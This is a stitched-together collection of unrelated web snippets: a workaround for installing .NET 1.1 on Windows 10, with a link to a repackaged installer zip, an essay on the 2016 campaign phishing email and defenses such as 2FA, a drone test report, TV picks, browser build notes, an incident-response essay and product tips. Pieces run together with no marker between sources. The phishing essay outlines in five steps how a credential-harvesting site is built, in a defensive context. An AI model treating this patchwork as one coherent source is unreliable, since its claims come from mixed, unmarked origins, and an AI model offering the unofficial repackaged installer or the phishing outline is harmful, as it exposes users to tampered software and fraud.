Yes, I know this is crazy but… I don’t know if anyone else would care. Windows 10 (7 & 8 as well, I guess…) include a .NET 2.0 option or a 3.5 which includes 2.0 install but if you need the first real ‘release’ version of .NET v1.1 you cannot install it. And some applications were pretty much hard coded to 1.1, even though the whole point of .NET was to avoid this kind of version/DLL hell.
Well I had come across this great post here on techjourney.net. And yes it sounds crazy but it works!
All you need to do is download the version 1.1 framework + SP 1, and slipstream the SP 1 patch into the directory and run the setup..
- dotnetfx.exe /c:”msiexec.exe /a netfx.msi TARGETDIR=C:\DotNet”
- dotnetfxsp1.exe /Xp:C:\DotNet\netfxsp.msp
- Run netfx.msi that was created in C:\DotNet\
I’ve gone ahead and combined the .NET v1.1 framework + SP1 into this zip file: dotnet1.1-withsp1.zip, so you can bypass those steps, and just go. No more bizare errors about the debugger not finding itself and crashing out the installer.
And now I can manage my nested VMware ESX 2.5.2 cluster on Windows 10 natively as managing from a VM just wasn’t the great experience I’d been hoping for.
The domain used by the attack, neweggstats.com, was hosted on a server at the Dutch hosting provider WorldStream and had a certificate. The domain was registered through Namecheap on August 13, using a registration privacy protection company in Panama. The domain's TLS certificate was purchased through Comodo on the same day. The Comodo certificate was likely the most expensive part of the attackers' infrastructure.
The US Air Force has revealed that an MQ-9 Reaper uncrewed aircraft successfully shot down a smaller drone with a heat-seeking air-to-air missile in a test last November. The details, provided by Col. Julian Cheater, commander of the 432nd Wing, came in an interview with Military.com at the Air Force Association's Air, Space, and Cyber Conference in Washington, DC, yesterday.
The Air Force's Air Combat Command has been exploring ways to arm the MQ-9 with air-to-air weapons since 2003. That was when the Air Force was preparing to issue a contract to General Atomics for the uncrewed aircraft, which was known at the time as the Predator-B. Much of the problem has been that the MQ-9, which is flown over a satellite communications link by Air Force operators, lacks the kind of sensors a fighter aircraft would use to track and target other aircraft. Its Lynx multimode radar is a synthetic aperture radar intended for tracking surface targets on land and sea and for providing ground imaging—but not for searching for other aircraft. Its other sensors (other than navigational cameras) were intended for tracking things below as well. And the MQ-9 lacks the sort of electronic-warfare sensors and countermeasures of crewed combat aircraft.
However, the Reaper's Multispectral Targeting System (MTS) has proven to be usable for tracking some types of flying targets. In 2016, the latest version of MTS, the MTS-C, successfully tracked missile launches in a test conducted by the Missile Defense Agency. The MTS-C added long-wave infrared to the short and medium infrared wavelength sensors used in previous versions, allowing the sensor to track "cold body" objects.
Mysterious hooded computer guys doing mysterious hooded computer guy .. things! Who knows what kind of naughty digital mischief they might be up to?
Unfortunately, we now live in a world where this kind of digital mischief is literally rewriting the world's history. For proof of that, you need look no further than this single email that was sent March 19th, 2016.
If you don't recognize what this is, it is a phishing email.
This is by now a very, very famous phishing email, arguably the most famous of all time. But let's consider how this email even got sent to its target in the first place:
An attacker slurped up lists of any public emails of 2008 political campaign staffers.
One 2008 staffer was also hired for the 2016 political campaign
That particular staffer had non-public campaign emails in their address book, and one of them was a powerful key campaign member with an extensive email history.
On successful phish leads to an even wider address book attack net down the line. Once they gain access to a person's inbox, they use it to prepare to their next attack. They'll harvest existing email addresses, subject lines, content, and attachments to construct plausible looking boobytrapped emails and mail them to all of their contacts. How sophisticated and targeted to a particular person this effort is determines whether it's so-called "spear" phishing or not.
In this case is it was not at all targeted. This is a remarkably unsophisticated, absolutely generic routine phishing attack. There is zero focused attack effort on display here. But note the target did not immediately click the link in the email!
Instead, he did exactly what you'd want a person to do in this scenario: he emailed IT support and asked if this email was valid. But IT made a fatal mistake in their response.
Do you see it? Here's the kicker:
Mr. Delavan, in an interview, said that his bad advice was a result of a typo: He knew this was a phishing attack, as the campaign was getting dozens of them. He said he had meant to type that it was an “illegitimate” email, an error that he said has plagued him ever since.
One word. He got one word wrong. But what a word to get wrong, and in the first sentence! The email did provide the proper Google address to reset your password. But the lede was already buried since the first sentence said "legitimate"; the phishing link in that email was then clicked. And the rest is literally history.
What's even funnier (well, in the way of gallows humor, I guess) is that public stats were left enabled for that bit.ly tracking link, so you can see exactly what crazy domain that "Google login page" resolved to, and that it was clicked exactly twice, on the same day it was mailed.
As I said, these were not exactly sophisticated attackers. So yeah, in theory an attentive user could pay attention to the browser's address bar and notice that after clicking the link, they arrived at
Note that the phishing URL is carefully constructed so the most "correct" part is at the front, and weirdness is sandwiched in the middle. Unless you're paying very close attention and your address bar is long enough to expose the full URL, it's … tricky. See this 10 second video for a dramatic example.
Quick phishing demo. Would you fall for something like this? pic.twitter.com/phONMKHBle— Mustafa Al-Bassam (@musalbas) September 9, 2018
(And if you think that one's good, check out this one. Don't forget all the unicode look-alike trickery you can pull, too.)
I originally wrote this post as a presentation for the Berkeley Computer Science Club back in March, and at that time I gathered a list of public phishing pages I found on the web.
Of those five examples from 6 months ago, one is completely gone, one loads just fine, and three present an appropriately scary red interstitial warning page that strongly advises you not to visit the page you're trying to visit, courtesy of Google's safe browsing API. But of course this kind of shared blacklist domain name protection will be completely useless on any fresh phishing site. (Don't even get me started on how blacklists have never really worked anyway.)
It doesn't exactly require a PhD degree in computer science to phish someone:
- Buy a crazy long, realistic looking domain name.
- Point it to a cloud server somewhere.
- Get a free HTTPS certificate courtesy of our friends at Let's Encrypt.
- Build a realistic copy of a login page that silently transmits everything you type in those login fields to you – perhaps even in real time, as the target types.
- Harvest email addresses and mass mail a plausible looking phishing email with your URL.
I want to emphasize that although clearly mistakes were made in this specific situation, none of the people involved here were amateurs. They had training and experience. They were working with IT and security professionals. Furthermore, they knew digital attacks were incoming.
The … campaign was no easy target; several former employees said the organization put particular stress on digital safety.
Work emails were protected by two-factor authentication, a technique that uses a second passcode to keep accounts secure. Most messages were deleted after 30 days and staff went through phishing drills. Security awareness even followed the campaigners into the bathroom, where someone put a picture of a toothbrush under the words: “You shouldn’t share your passwords either.”
The campaign itself used two factor auth extensively, which is why personal gmail accounts were targeted, because they were less protected.
The key takeaway here is that it's basically impossible, statistically speaking, to prevent your organization from being phished.
Or is it?
Nobody is doing better work in this space right now than Maciej Ceglowski and Tech Solidarity. Their list of basic security precautions for non-profits and journalists is pure gold and has been vetted by many industry professionals with security credentials that are actually impressive, unlike mine. Everyone should read this list very closely, point by point.
Computers, courtesy of smartphones, are now such a pervasive part of average life for average people that there is no longer any such thing as "computer security". There is only security. In other words, these are normal security practices everyone should be familiar with. Not just computer geeks. Not just political activists and politicians. Not just journalists and nonprofits.
It is a fair bit of reading, so because I know you are just as lazy as I am, and I am epically lazy, let me summarize what I view as the three important takeaways from the hard work Tech Solidarity put into these resources. These three short sentences are the 60 second summary of what you want to do, and what you want to share with others so they do, too.
1) Enable Two Factor authentication through an app, and not SMS, everywhere you can.
Logging in with only a password, now matter how long and unique you attempt to make that password, will never be enough. A password is what you know; you need to add the second factor of something you have (or something you are) to achieve significant additional security. SMS can famously be intercepted, social engineered, or sim-jacked all too easily. If it's SMS, it's not secure, period. So install an authenticator app, and use it, at least for your most important credentials such as your email account and your bank.
Have I mentioned that Discourse added two factor authentication support in version 2.0, and our just released 2.1 adds printed backup codes, too? There are two paths forward: you can talk about the solution, or you can build the solution. I'm trying to do both to the best of my ability. Look for the 2FA auth option in your user preferences on your favorite Discourse instance. It's there for you.
(This is also a company policy at Discourse; if you work here, you 2FA everything all the time. No other login option exists.)
2) Make all your passwords 11 characters or more.
It's a long story, but anything under 11 characters is basically the same as having no password at all these days. I personally recommend at least 14 characters, maybe even 16. But this won't be a problem for you, because...
3) Use a password manager.
If you use a password manager, you can simultaneously avoid the pernicious danger of password re-use and the difficulty of coming up with unique and random passwords all the time. It is my hope in the long run that cloud based password management gets deeply built into Android, iOS, OSX, and Windows so that people don't need to run a weird melange of third party apps to achieve this essential task. Password management is foundational and should not be the province of third parties on principle, because you never outsource a core competency.
Bonus rule! For the particularly at-risk, get and use a U2F key.
In the long term, two factor through an app isn't quite secure enough due to the very real (and growing) specter of real-time phishing. Authentication apps offer timed keys that expire after a minute or two, but if the attacker can get you to type an authentication key and relay it to the target site fast enough, they can still log in as you. If you need ultimate protection, look into U2F keys.
I believe U2F support is still too immature at the moment, particularly on mobile, for this to be practical for the average person right now. But if you do happen to fall into those groups that will be under attack, you absolutely want to set up U2F keys where you can today. They're cheap, and the good news is that they literally make phishing impossible at last. Given that Google had 100% company wide success against phishing with U2F, we know this works.
In today's world, computers are now so omnipresent that there is no longer any such thing as cybersecurity, online security, or computer security – there's only security. You either have it, or you don't. If you follow and share these three rules, hopefully you too can have a modicum of security today.
September 22, 2018 Netflix will continue "Minecraft: Story Mode" project, but other Telltale projects are all effectively cancelled in the wake of mass layoffs at the company Friday.
September 21, 2018 Telltale has confirmed it will close following a round of mass layoffs.Telltale Games, the studio best known for narrative adventure titles like the Walking Dead, will soon shut down. Early reports suggested that around 90% of the studio's 250 employees have been laid off, and the company has now confirmed that it will close. An official announcement says that a "majority" of the studio's employees were let go today, leaving a small group of 25 to "fulfill the company's obligations to its board and partners" ahead of the shutdown. "It's been an incredibly difficult year for Telltale as we worked to set the company on a new course," CEO Pete Hawley says in the statement. "Unfortunately, we ran out of time trying to get there. We released some of our best content this year and received a tremendous amount of positive feedback, but ultimately, that did not translate to sales. With a heavy heart, we watch our friends leave today to spread our brand of storytelling across the games industry. According to journalist Jeffrey Grub on Twitter, staff at Telltale numbered around 250, which leaves 90% of the studio immediately without jobs. A source tells Dot Esports that the currently affected employees have been released without severance. The news appears to have hit the studio itself suddenly, as well - the last word from the official Twitter account was only three hours ago as of this post.
Read more of this story at Slashdot.
Base jumper's jump ends poorly. Luckily for him, he's still alive and talking to himself about how he voluntarily chose to be grievously injured. Nobody forced him [Fail]
If you want to visit a National Park, and don't mind crowds, Saturday is the day for you.
Via the NPS:
There are many ways to participate in National Public Lands Day.
- You can visit a national park for free.
- You can take part in a volunteer work project.If you volunteer on this day, you will receive a fee-free day coupon to be used on a future date.
- You can share your favorite outdoor activity on social media channel with the hashtag #NPSVolunteer, #FindYourPark and #NPLD!
National Public Lands Day is organized annually by the National Environmental Education Foundation, in cooperation with Department of the Interior, Department of the Army, and Department of Agriculture. The National Park Service is one of the event’s largest providers of sites and volunteers. Other participating federal agencies include the US Fish and Wildlife Service, Bureau of Land Management, Bureau of Reclamation, US Forest Service, and US Army Corps of Engineers.
Warning: Parking will be a disaster at many of our popular parks.
Point-and-click adventure games had a bit of a renaissance in the last decade, but have become harder to find ever since Telltale discovered a different formula with The Walking Dead in 2012. Luckily, indie developers are there to fill the void for folks who still like walking into a room and poking at everything they see.
Lamplight City is a new adventure game from the creator of Shardlight, and offers a unique twist on the familiar detective stories frequently used in this genre. Like old LucasArts games there's never a failure state, but that doesn't mean the main character can't mess things up for himself. It's up to you whether you prefer to play the character as a competent detective or an irredeemable screw-up, and it's pretty interesting exploring different paths to see how things turn out in both cases.
Small-Screen Stream: ‘American Vandal’ Season 2, More ‘Ozark,’ and Emmy-Nominated Series You Shouldn’t Miss
(Welcome to Small-Screen Stream, a feature where we share the best television shows streaming and where you can watch them.)
I don’t know about you, but I’ve been spending this in-between season trying to catch up on literally everything, while also falling victim to comfortable pleasures. That means: a lot of binges of new seasons, mixed with a lot of lazy-couch viewings of old familiars. What can I say–fall is fast approaching, and with it, a desire to light a candle and take in the elements, acknowledging that prestige movie season is fast upon us, as are the holidays.
For this week’s column, you’ll find a mix of freshly released seasons of shows you might already love, some suggestions for shows that won Emmys this week, and a few old-school favorites secretly hiding in the annals of Hulu.
American Vandal, Seasons 1-2
Where To Watch: Netflix
Created By: Dan Perrault, Tony Yacenda
Starring: Tyler Alvarez, Griffin Gluck, Jimmy Tatro
I love American Vandal. It’s one of the funniest things I’ve ever seen, and remains one of the most impressively dedicated mockumentaries ever committed to film. The perfect first season revolves around a large-scale penis joke, and the recently released second season goes even farther – from dick jokes to poop jokes. It’s potty humor for those of us – like me – who still find that sort of thing hilarious in a primal, stupid, inexplicable way.
Family Matters, Seasons 1-9
Where To Watch: Hulu
Created By: Thomas L. Miller, Robert L. Boyett
Starring: Jaleel White, Reginald VelJohnson, Jo Marie Payton
Did you know Hulu has a ton of old TGIF sitcoms? In the interest of brevity, I’ve only named this (and one other farther down the list), but there’s a whole lineup waiting to be delved into. I grew up on Family Matters, and as long-time citizen of Chicago, the house featured in the opening credits was part of our city’s pop culture mythology. Jaleel White made a surprise appearance in this week’s Emmy awards, which triggered a mini-rewatch of the season for me.
Ozark, Seasons 1-2
Where To Watch: Netflix
Created By: Bill Dubuque, Mark Williams
Starring: Jason Bateman, Laura Linney, Sofia Hubiltz, Skylar Gaertner, Julia Garner
I’m fresh out of cares when it comes to Jason Bateman, who tried my patience after an ill-advised New York Times interview where he failed to defend his Arrested Development cast mate Jessica Walter, who admitted she was routinely emotionally abused by her onscreen husband on that show, Jeffrey Tambor. That may seem like an inconsequential thing to bring into a description of Ozark, but if you’re like me, you may have a hard time separating your consistent disappointment in good actors and creators from the disappointing names they make for themselves in the news.
I caught up on Ozark not because I felt obligated, but out of a sort of primal investment out of my enjoyment of the first season. And because, as I like to tell myself, shows and movies are not just one person’s involvement, but a great many. And the show is pretty damn good, a Midwestern Breaking Bad about a family who relocates from Chicago to the Ozarks after their patriarch’s money-laundering scheme goes wrong. The second season dropped on Netflix in late August and I’ve been making my way through it slowly. It doesn’t reach quite the same heights as the first, but the cast is still top-notch – despite my Bateman misgivings – and if you loved what came before, you’ll love its follow-up, too.
The Catch, Seasons 1-2
Where To Watch: Hulu
Created By: Kate Atkinson, Helen Gregory, Jennifer Schuur
Starring: Mireille Enos, Peter Krause
This is one of those shows I tuned into solely because I love the two leads from past performances. Enos and Krause are staples in my television-loving household, and they have fun in this show, which only lasted two seasons before it was canceled last year. I can’t exactly argue with the decision to axe it, but I’ve enjoyed the first two outings. Enos plays Alice, who runs a private investigation firm in L.A., and Krause plays her con artist fiancee. It feels like low-grade Shonda Rhimes fare, but their chemistry is great, and it bumbles along enough to earn its place as a Sunday-evening easy watch.
Atypical, Seasons 1-2
Where To Watch: Netflix
Created By: Robia Rashid
Starring: Jennifer Jason Leigh, Keir Gilchrist, Brigette Lundry,Paine, Michael Rapaport
I hadn’t heard of Atypical until Netflix recommended it, and I’m so glad it did, because this is a truly special little series, about an autistic teen named Sam Gardner (Keir Gilchrist) who is looking for love, and the family around him who struggle with finding meaning beyond his diagnosis. The show was rightfully criticized in season one for its lack of proper representation in not featuring any real-life autistic actors, but it amended that in season two. It’s always a delight to see more Jennifer Jason Leigh, who shines here as Sam’s mother, a woman trying to find her place in Sam’s life while steering her own path.
Black Sails, Seasons 1-4
Where To Watch: Hulu
Created By: Jonathan E. Steinberg, Robert Levine
Starring: Toby Stephens, Hannah New, Luke Arnold, Jessica Parker Kennedy, Tom Hopper
Several of my dearest friends have been pestering me to watch Black Sails for the last few months. Knowing that I love Game of Thrones, they promised me this was an even more assured show in a similar vein, about pirates and renegades and scoundrels; AKA my exact cup of tea. I’m very early in my Black Sails viewing party, but I’m here to report that they weren’t lying. The show lacks Thrones’ fantasy stylings, but makes up for it in gritty character work. It works as a prequel to Robert Louis Stevenson’s seminal novel Treasure Island, following characters like John Silver (Luke Arnold) and Captain Flint (Toby Stephens) as they embark on new adventures.
The post Small-Screen Stream: ‘American Vandal’ Season 2, More ‘Ozark,’ and Emmy-Nominated Series You Shouldn’t Miss appeared first on /Film.
As deadly as it might be, the Bush Viper is one of the cutest animals in the world. (Source: https://ift.tt/2OwEDUU)
A brass plaque dedicated to a convicted cannibal hangs in the National Press Club, and that's not even the craziest part of the story [Weird]
Medical infusion pumps, which deliver medications to patients, are archetypal examples of the expanding threat surface being delivered by connected devices. Connecting these pumps to clinical systems can improve healthcare delivery, but if not properly secured could endanger the patient and expose the health delivery organization (HDO) infrastructure to intrusion.
Verizon officials were contrite and apologetic during a California State Assembly committee hearing that was convened Friday to examine mobile Internet throttling experienced by firefighters during recent blazes.
"We all make mistakes from time to time, the true measure of leadership is how soon we admit it, own it," Rudy Reyes told the Select Committee on Natural Disaster, Response, Recovery, and Rebuilding after reading from a statement that the company released hours earlier.
In that statement, Verizon said it would be introducing a "new plan" with truly unlimited data and "priority access" for first responders nationwide.
Vulnerabilities in smart electric plugs give attackers a staging point for scanning and attacking your whole network
If an attacker takes control of a device inside your network -- by exploiting a defect in it or a mistake you made in configuring it or by tricking you somehow -- then they can do all kinds of bad things, like scanning your local network for other vulnerable devices, attacking them and taking control over them. (more…)
A new study suggest trying too hard at work is bad for your career, so maybe it is OK to go in and half-ass it each day after all [Interesting]
Read more of this story at Slashdot.
PM28XP pre-release build:
Official repo changes since my last build:
- [PALEMOON] [frontend vs backend] Implemented "originPrincipal" and "triggeringPrincipal" (8d42d5cad)
- Merge pull request #680 from janekptacijarabaci/pm_principal_origin-triggering_1 (43cebecad)
- Remove dead WebApps code. (017cb0351)
- Remove dead Help Viewer skin mapping from Toolkit (68198c587)
- Enable d3d9 accelerated layers as a fallback. (f7b00e782)
- Merge pull request #681 from JustOff/PR_remove_helpviewer_skin (a92253e8d)
- Disable battery API by default to reduce private data exposure to the web (66d949a32)
- Tune the network stack (b450f90cd)
- Merge pull request #685 from trav90/default-pref-updates (ddb2b9768)
- Bug 1335296 - Expand about:support WebGL information (e7f7100ba)
- Bug 1341957 - Add webgl.getSupportedExtensions() to about:support (d84ee90be)
- Version bump (d66259dc9)
- Update HSTS preload list (e79f2ee69)
- Merge pull request #688 from janekptacijarabaci/about-support_WebGL-information_expand_1 (f8761cf8c)
- Fix theme/os mismatch with full screen/private browsing caption buttons on Macintosh (803dfd7b1)
- Link to developer site from readme. (f1f409190)
* This build is beyond official 27.9.4 build.
32bit SSE https://o.rthost.cf/palemoon/palemoon-27.9.1a1.win32-git-20180804-065137b07-xpmod-sse.7z
32bit noSSE https://o.rthost.cf/palemoon/palemoon-27.9.1a1.win32-git-20180804-065137b07-xpmod-ia32.7z
source repo: https://github.com/roytam1/palemoon27
repo changes since my last build:
- import changes from tenfourfox: Bug 1397811, Bug 1411458, Bug 1406750, Bug 1347639, Bug 1371908, Bug 1357711 (065137b07)
New regular/weekly KM-Goanna release:
* switched Goanna repo to https://github.com/roytam1/palemoon27
* update Goanna3 to git 1e0176c7d...065137b07:
- import changes from tenfourfox: Bug 1397811, Bug 1411458, Bug 1406750, Bug 1347639, Bug 1371908, Bug 1357711 (065137b07)
* Notice: the changelog above may not always applicable to XULRunner code which K-Meleon uses.
When I started in the industry, there were no real training courses or programs available, and IR business models pretty much required (and still do) that a new analyst is out on the road as soon as they're hired. I got started in the industry and developed some skills, had some training (initial EnCase training in '99), and when I got to a consulting position, I was extremely fortunate to have a boss who took an interest in mentoring me and providing guidance, which I greatly appreciate to this day.
However, I've seen this same issue with business models as recently as 2018. New candidates for IR teams are interviewed, and once they're hired and go through the corporate on-boarding, there is little if any facility for training or supervising...the analysts are left to themselves. Yes, they are provided with tools, software products, and report templates, but for the most part, that's it. How are they communicating with clients? Are they sending in regular updates? If so, are those updates appropriate, and more importantly, are they technically correct? Are the analysts maintaining case notes?
Over the years of doing IR work, I ran into the usual issues that most of us see...like trying to find physical systems in a data center by accessing the system remotely and opening the CD-ROM tray. But two things kept popping into my mind; one was, I really wished that there was a way to get a broader view of what was happening during an incident. Rather than the client sending me the systems that they thought were involved or the "key" systems, what if I could get a wider view of the incident? This was very evident when there were indications on the systems I was examining that pointed to them being accessed from other systems, or accessing other systems, on the same infrastructure.
The other was that I was spending a lot of time looking at what was left behind after a process ran. I hadn't seen BigFoot tromp across the field, because due to the nature of IR, all I had to look at were footprints that were several days old. What if, instead of telling the client that there were gaps in the data available for analysis (because I'm not going to guess or speculate...) I actually had a recording of the process command lines?
During one particularly fascinating engagement, it turned out that the client had installed a monitoring program on two of the affected systems. The program was one of those applications that parents use to monitor their kid's computers, and what the client provided was 3-frame-per-second videos of what went on. As such, I just accessed the folder, found all of the frames with command prompts open, and could see exactly what the adversary typed in at the prompt. I then went back and watched the videos to see what the adversary was doing via the browser, as well as via other GUI applications.
How useful are process command lines? Right now, there're considerable artifacts on systems that give analysts a view into what programs were run on a system, but not how they were run. For instance, during an engagement where we had established process creation monitoring across the enterprise, an alert was triggered on the use of rar.exe, which is very often as a means of staging files for exfiltration. The alert was not for "rar.exe", as the file had been renamed, but was instead for command line options that had been used, and as such, we had the password used to encrypt the archives. When we receive the image from the system and recovered the archives (they'd been deleted after exfil), we were able to open the archives and show the client exactly what was taken.
So, things have progressed quite a bit over the years, while some things remain the same. While there have been significant in-roads made into establishing enterprise-wide visibility, the increase of device types (Windows, Mac, Linux, IoT, mobile, etc.) still requires us to have the ability to go out and get (or receive) individual devices or systems for collection and analysis; those skills will always be required. As such, if the business model isn't changed in some meaningful way, we are going to continue to have instances where someone without the appropriate skill sets is sent out on their own.
The next step in the evolution of IR is MDR, which does more than just mash MSS and IR together. What I mean by that is that the typical MSS functionality receives an alert, enriches it somehow, and sends the client a ticket (email, text, etc.). This then requires that the client receive and understand the message, and figure out how they need to respond...or that they call someone to get them to respond. While this is happening, the adversary is embedding themselves deeply within the infrastructure...in the words of Jesse Ventura from the original Predator movie, "...like an Alabama tick."
Okay, so what do you do? Well, if you're going to have enterprise-wide visibility, how about adding enterprise-wide response and remediation? If we're able to monitor process command lines, what if we could specify conditions that are known pretty universally to be "bad", and stop the processes? For example, every day, hundreds of thousands of us log into our computers, open Outlook, check our email, and read attachments. This is all normal. What isn't normal is when that Word document that arrived as an email attachment "opens" a command prompt and downloads a file to the system (as a result of an embedded macro). If it isn't normal and it isn't supposed to happen and we know it's bad, why not automatically block it? Why not respond at software speeds, rather than waiting for the detection to get back to the SOC, for an analyst to review it, for the analyst to send a ticket, and for the client to receive the ticket, then open it, read it, and figure out what to do about it? In that time, your infrastructure could be hit by a dedicated adversary, or by ransomware.
If you stop the download from occurring, you prevent all sorts of bad follow-on things from happening, like having to report a "personal data breach", per GDPR.
Of course, the next step would be to automatically isolate the system on the network. Yes, I completely understand that if someone's trying to do work and they can't communicate off of their own system, it's going to hamper or even obviate their workflow. But if that were the case, why did they say, "Yes, I think I will "enable content", thank you very much!", after the phishing training showed them why they shouldn't do that? I get that it's a pain in the hind end, but which is worse...enterprise-wide ransomware that not only shuts everything down but requires you to report to GDPR, or one person having to have a new computer to get work done?
So, the overall point I'm trying to make here is that the future of IR is going to be to detect and respond faster. Faster than we have been. Get ahead of the adversary, get inside their OODA loop, and cycle through the decision process faster than they can respond. I've seen this in action...the military has things called "immediate actions", which are actions that, when a condition is met, you respond immediately. In the military, you train at these things until they're automatic muscle memory, so that when those things go occur (say, your rifle jams), you perform the actions immediately. We can apply these sorts of things to the OODA loop by removing the need to make decisions under duress because we made them ahead of time; we made the decision regarding a specific action while we had the time to think about it, so that we didn't have to try to make the decision during an incident.
In order to detect and respond quicker, this is going to require a couple of things:
I'll be addressing these topics in future blog posts.
Brett Shavers posted another great article in which he discussed a much-needed skill in DFIR, albeit one that isn't taught in any courses. That is, communicating to others. If you really think about it, this is incredibly, critically, vitally important. What good is it to have a good, great, or even the best threat intel or DFIR analyst, if they are unable to communicate with others and share their findings? And I'm not talking about just the end results, but also being able to clearly articulate what led to those findings. What is it that you're seeing, for example, that indicates that there's an adversary active in an environment, versus a bunch of persistence mechanisms kicking off when systems are booted? Can you articulate your reasoning, and can you articulate where the gaps are, as well?
Something to keep in mind...there is a distinct difference between being not able to clearly delineate or share findings, and simply being unwilling to do so.
DFIR Skillz - Tech Skillz
A great way to develop technical analysis DFIR skills is to practice technical analysis DFIR skills. There are a number of DFIR challenge images posted online and available for download that you can use to practice skills.
The CFReDS data leakage case provides a great opportunity to work with different types of data from a Windows 7 system, as well as from external devices.
The LoneWolf scenario at the DigitalCorpora site is pretty fascinating, as it allows you to practice using a number of tools, such as hindsight, Volatility, bulk_extractor, etc. The scenario includes an image of a Win 10 laptop with a user profile that includes browser (Chrome, IE) history, a hibernation file, a memory dump, a page file, a swap file, etc. This scenario and the accompanying data was produced by Thomas Moore, as his final project for one of Simson Garfinkel's courses at GMU. The challenge in this scenario will be learning from the image, having not taken the course.
Ali Hadi, PhD, makes a number of datasets available for download. I especially like challenge #1, as it's a great opportunity to try your hand at various analysis tasks, such as using Yara to detect webshells, etc. There are also a couple of other really cool things you can do with the available data; many thanks to @binaryz0ne for providing the scenarios and the datasets.
These are just a few examples of what's available; perhaps the best way to really get the most from these scenarios is to work with a mentor. I can see that many enthusiasts will download the images, maybe start down the road a bit, but not really get anywhere meaningful due to road blocks of some kind. Having someone that you can bounce ideas off ("how does this analysis plan look?"), seek guidance from, etc., would be a great way to move beyond where you are now, and really expand your skill sets.
DFIRDudes (Hadar and Martin) have kicked off (here's the tweet announcing it) a new blog with an inaugural post on StartupInfo files. This is a great idea, because as Brett had mentioned previously, there's a lot of great info that is peppered on to Twitter that really needs a much more permanent home someplace, one that's a bit roomier (and more persistent) than 280 characters. The first sentence of the first post really sets the tone, and gives the blog a good push away from the dock.
If you're on the fence about starting a blog, check out Phill's post, because his answer is a resounding "yes".
HelpNetSecurity had a fascinating article recently that discusses a surge in retail breaches. While this data is based on survey, I still find it fascinating that in 2018, more organizations haven't pursued the implementations of instrumentation and visibility into their infrastructures that would provide for early detection and response. And yes, I do understand that the focus of the survey (and as a result, the data) is retailers, organizations that wouldn't necessarily have the budget for such things.
Perhaps the most telling part of the article is that, "Security spending is up but not aligning with risk."
I've received some great contributions to the repository over the past month or so; many, many thanks to those who've contributed plugins!
Developers are gearing up for the final release of macOS 10.14. Ahead of the public release, Steam has updated its Mac app with support for 64-bit. Not only that the update also brings new design changes as well as n=forward-facing additions. The 64-bit support is important for Steam and other developers because macOS Mojave will be the last version which will support 32-bit applications. So let’s dive in to see some more details on the matter.
Steam For Mac Has Been Updated With 64-bit Support And Also Adds A New Design
It was noted in a Reddit thread that update to 64-bit support gives Steam a gigantic performance boost. The interface is now more responsive and the overall user experience is “significantly better” compared to the 32-bit version of the app. However, performance is not the only aspect which was kept in mind when developing the update.
The new Steam for Mac update now also includes a new chat system which is more modern and up to date. It is now more flexible and also provides features like group chat built for gaming. The new features and the layout can be found on Steams’s official website, so do check that out as well.
Apart from all this, the platform has also stopped using the pre-Yosemite windows button and now supports the current design.
Yesterday they pushed out a big update with a new chat system they had been testing recently, and, after checking, all of Steam finally seems to run on 64 bit now!
On top of that, they finally stopped using the pre-Yosemite window buttons and added the current versions.
Steam is one of the very few apps which has adopted the 64-bit support for macOS Mojave. The operating system started warning users earlier this year that all 32-bit applications would become redundant or incompatible. Apple also notified users and developers at the WWDC this year, stating that macOS Mojave will be the last version to support 32-bit apps.
There will be more to the story, so be sure to stay tuned in for more details. This is all for now, folks. What are your thoughts on the matter? Do you think developers should start updating their apps with 64-bit support? Let us know in the comments section below.
The post Steam For Mac Is Now 64-bit, Also Brings New Design And Chat Features by Ali Salman appeared first on Wccftech.
One of the best books I ever listened to is Shantaram. This very long story — 43 hours! — is the fictionalized autobiography of an Australian outlaw who hides out in the slums of Bombay, is thrown in Indian prison for drug dealing and eventually follows his guru to fight for the muhadjin in Afghanistan. He is a holy thief, a wise sinner, a coyote trickster, and this meld of the sacred and profane is what gives the story its epic rousing power. The narrator in the audible version does hundreds of foreign accents pitch-perfectly and captures the enthusiasm of the Indian sub-continent. Even after 43 hours I wished the story-telling would never end. — KK
Best news app
Smartnews is a free, lightweight, mobile app for iOS and Android. It presents the top news stories in different categories and is updated frequently. You can add your favorite news sites to it, too. When I want to find out what’s going on, it’s the first place I go. — MF
Indie online projects
MakeHub is an crowdsourced list of interesting and useful projects by indie developers. You can sort by which has the most social media followers or votes on Product Hunt. Through MakeHub, I came across colorkuler, which extracts and displays your instagram color palette, and had fun comparing my palette with people I follow. — CD
High leverage philanthropy
I’ve been making micro-loans to entrepreneurs in the developing world via Kiva for 10 years. I loan small amounts (less than $100) to say, women in Africa hoping to buy a sewing machine to start their own sewing business, or herders in Bolivia needing some equipment to make cheese, and soon enough they will repay the loan, so I can re-loan the money again to someone else. I’ve gone through 4 cycles of loans for my first money, and there is less than 0.1% delinquency — a rate any bank would die for. 100% of my money goes to helping the individuals I select; Kiva’s operating costs are funded separately. The money keeps going around. It’s one of the best bargains in the world. — KK
Worry about it later list
I got the idea to make a worry list from this Forbes article on organizing your feelings. I keep a sticky note on my laptop and when something is bugging me I add it to the list and mentally shelve it until later. By the end of the day, most of it doesn’t matter and then I get to cross it out and that feels great. — CD
We have pantry moths in our kitchen cupboards, and can’t get rid of them. But we can greatly reduce how many there are with these moth traps. They look like little scout tents but the inner walls are coated with a sticky substance. Once every 9 months we replace the trap, which by then is covered with the creatures. — MF